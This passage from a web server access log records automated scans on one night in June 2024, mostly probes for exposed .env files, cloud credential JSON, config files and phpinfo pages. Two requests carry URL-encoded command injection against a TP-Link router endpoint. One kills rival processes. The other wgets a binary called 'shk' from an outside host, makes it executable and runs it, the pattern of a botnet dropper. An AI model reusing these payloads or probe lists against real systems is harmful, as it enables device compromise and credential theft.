/core/.env HTTP/1.1" 404 731 2.57.169.183 - - [17/Jun/2024:23:16:36 +0200] "POST /core/.env HTTP/1.1" 404 731 2.57.169.183 - - [17/Jun/2024:23:16:36 +0200] "GET /docker/.env HTTP/1.1" 404 733 2.57.169.185 - - [17/Jun/2024:23:16:37 +0200] "POST /docker/.env HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:16:38 +0200] "GET /fedex/.env HTTP/1.1" 404 732 2.57.169.185 - - [17/Jun/2024:23:16:38 +0200] "POST /fedex/.env HTTP/1.1" 404 732 2.57.169.183 - - [17/Jun/2024:23:16:39 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 752 2.57.169.185 - - [17/Jun/2024:23:16:44 +0200] "GET /local/.env HTTP/1.1" 404 732 2.57.169.184 - - [17/Jun/2024:23:16:44 +0200] "POST /local/.env HTTP/1.1" 404 732 2.57.169.184 - - [17/Jun/2024:23:16:45 +0200] "GET /rest/.env HTTP/1.1" 404 731 2.57.169.183 - - [17/Jun/2024:23:16:46 +0200] "POST /rest/.env HTTP/1.1" 404 731 2.57.169.184 - - [17/Jun/2024:23:16:48 +0200] "GET /shared/.env%20 HTTP/1.1" 404 736 2.57.169.184 - - [17/Jun/2024:23:17:01 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 749 2.57.169.184 - - [17/Jun/2024:23:17:02 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 749 2.57.169.184 - - [17/Jun/2024:23:17:02 +0200] "GET /enviroments/.env HTTP/1.1" 404 738 2.57.169.183 - - [17/Jun/2024:23:17:02 +0200] "POST /enviroments/.env HTTP/1.1" 404 738 2.57.169.183 - - [17/Jun/2024:23:17:03 +0200] "GET / HTTP/1.1" 200 1895 2.57.169.183 - - [17/Jun/2024:23:17:08 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 744 2.57.169.183 - - [17/Jun/2024:23:17:08 +0200] "GET /debug/default/view.html HTTP/1.1" 404 749 2.57.169.184 - - [17/Jun/2024:23:17:09 +0200] "GET /debug/default/view HTTP/1.1" 404 744 2.57.169.184 - - [17/Jun/2024:23:17:09 +0200] "GET /frontend/web/debug/default/view HTTP/1.1" 404 765 2.57.169.185 - - [17/Jun/2024:23:17:09 +0200] "GET /web/debug/default/view HTTP/1.1" 404 752 2.57.169.184 - - [17/Jun/2024:23:17:10 +0200] "GET /sapi/debug/default/view HTTP/1.1" 404 753 45.148.10.174 - - [17/Jun/2024:23:17:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:23:17:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 2.57.169.184 - - [17/Jun/2024:23:17:18 +0200] "GET /AwsConfig.json HTTP/1.1" 404 732 2.57.169.183 - - [17/Jun/2024:23:17:18 +0200] "GET /awsconfig.json HTTP/1.1" 404 732 2.57.169.185 - - [17/Jun/2024:23:17:20 +0200] "GET /aws.json HTTP/1.1" 404 726 2.57.169.184 - - [17/Jun/2024:23:17:20 +0200] "GET /conf.json HTTP/1.1" 404 727 2.57.169.183 - - [17/Jun/2024:23:17:20 +0200] "GET /env.json HTTP/1.1" 404 726 2.57.169.185 - - [17/Jun/2024:23:17:22 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 739 2.57.169.185 - - [17/Jun/2024:23:17:22 +0200] "GET /.json HTTP/1.1" 404 723 2.57.169.183 - - [17/Jun/2024:23:17:23 +0200] "GET /smtp.json HTTP/1.1" 404 727 2.57.169.184 - - [17/Jun/2024:23:17:24 +0200] "GET /db.json HTTP/1.1" 404 725 2.57.169.185 - - [17/Jun/2024:23:17:24 +0200] "GET /sendgrid.json HTTP/1.1" 404 731 2.57.169.183 - - [17/Jun/2024:23:17:24 +0200] "GET /ws-config.json HTTP/1.1" 404 732 2.57.169.185 - - [17/Jun/2024:23:17:25 +0200] "GET /_wpeprivate/config.json HTTP/1.1" 404 745 2.57.169.184 - - [17/Jun/2024:23:17:25 +0200] "GET /deployment-config.json HTTP/1.1" 404 740 2.57.169.184 - - [17/Jun/2024:23:17:25 +0200] "GET /sftp-config.json HTTP/1.1" 404 734 2.57.169.183 - - [17/Jun/2024:23:17:34 +0200] "GET /robomongo.json HTTP/1.1" 404 732 2.57.169.184 - - [17/Jun/2024:23:17:35 +0200] "GET /client_secrets.json HTTP/1.1" 404 737 2.57.169.183 - - [17/Jun/2024:23:17:43 +0200] "GET /ssh-config.json HTTP/1.1" 404 733 2.57.169.184 - - [17/Jun/2024:23:17:49 +0200] "GET /config/default.json HTTP/1.1" 404 741 2.57.169.184 - - [17/Jun/2024:23:17:49 +0200] "GET /config/config.json HTTP/1.1" 404 740 2.57.169.184 - - [17/Jun/2024:23:17:51 +0200] "GET /credentials/config.json HTTP/1.1" 404 745 2.57.169.183 - - [17/Jun/2024:23:18:01 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 752 2.57.169.184 - - [17/Jun/2024:23:18:02 +0200] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 736 2.57.169.185 - - [17/Jun/2024:23:18:07 +0200] "GET /config/parameters.yml HTTP/1.1" 404 743 2.57.169.185 - - [17/Jun/2024:23:18:08 +0200] "GET /parameters.yml HTTP/1.1" 404 732 2.57.169.183 - - [17/Jun/2024:23:18:09 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 739 2.57.169.183 - - [17/Jun/2024:23:18:09 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 755 2.57.169.183 - - [17/Jun/2024:23:18:15 +0200] "GET /info.php HTTP/1.1" 404 726 2.57.169.185 - - [17/Jun/2024:23:18:15 +0200] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 404 822 2.57.169.184 - - [17/Jun/2024:23:18:21 +0200] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 752 2.57.169.183 - - [17/Jun/2024:23:18:21 +0200] "GET /phpinfo HTTP/1.1" 404 725 2.57.169.183 - - [17/Jun/2024:23:18:22 +0200] "GET /symfony/public/_profiler/phpinfo HTTP/1.1" 404 762 2.57.169.185 - - [17/Jun/2024:23:18:22 +0200] "GET /html/phpinfo.php HTTP/1.1" 404 738 2.57.169.183 - - [17/Jun/2024:23:18:27 +0200] "GET /__info.php HTTP/1.1" 404 728 2.57.169.183 - - [17/Jun/2024:23:18:28 +0200] "GET /_info-backoffice.php HTTP/1.1" 404 738 2.57.169.185 - - [17/Jun/2024:23:18:29 +0200] "GET /_info.php HTTP/1.1" 404 727 2.57.169.184 - - [17/Jun/2024:23:18:31 +0200] "GET /_phpinf.php HTTP/1.1" 404 729 2.57.169.184 - - [17/Jun/2024:23:18:36 +0200] "GET /_poopinfo.php HTTP/1.1" 404 731 2.57.169.184 - - [17/Jun/2024:23:18:37 +0200] "GET /.__info.php HTTP/1.1" 404 729 2.57.169.185 - - [17/Jun/2024:23:18:37 +0200] "GET /.info.php HTTP/1.1" 404 727 2.57.169.185 - - [17/Jun/2024:23:18:38 +0200] "GET /0.0_phpinfo.php HTTP/1.1" 404 733 2.57.169.184 - - [17/Jun/2024:23:18:39 +0200] "GET /00_server_info.php HTTP/1.1" 404 736 2.57.169.184 - - [17/Jun/2024:23:18:40 +0200] "GET /02-info.php HTTP/1.1" 404 729 2.57.169.184 - - [17/Jun/2024:23:18:40 +0200] "GET /1_1_PhpInfo.php HTTP/1.1" 404 733 2.57.169.184 - - [17/Jun/2024:23:18:47 +0200] "GET / HTTP/1.1" 200 1895 2.57.169.184 - - [17/Jun/2024:23:18:47 +0200] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 769 220.79.204.243 - - [17/Jun/2024:23:19:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 159.203.31.149 - - [17/Jun/2024:23:23:27 +0200] "-" 400 1930 159.203.31.149 - - [17/Jun/2024:23:23:27 +0200] "-" 400 1930 159.203.31.149 - - [17/Jun/2024:23:23:27 +0200] "GET / HTTP/1.1" 200 1895 159.203.31.149 - - [17/Jun/2024:23:23:28 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 146.70.199.211 - - [17/Jun/2024:23:34:19 +0200] "GET / HTTP/1.1" 200 1895 45.156.128.49 - - [17/Jun/2024:23:51:09 +0200] "GET / HTTP/1.1" 200 1895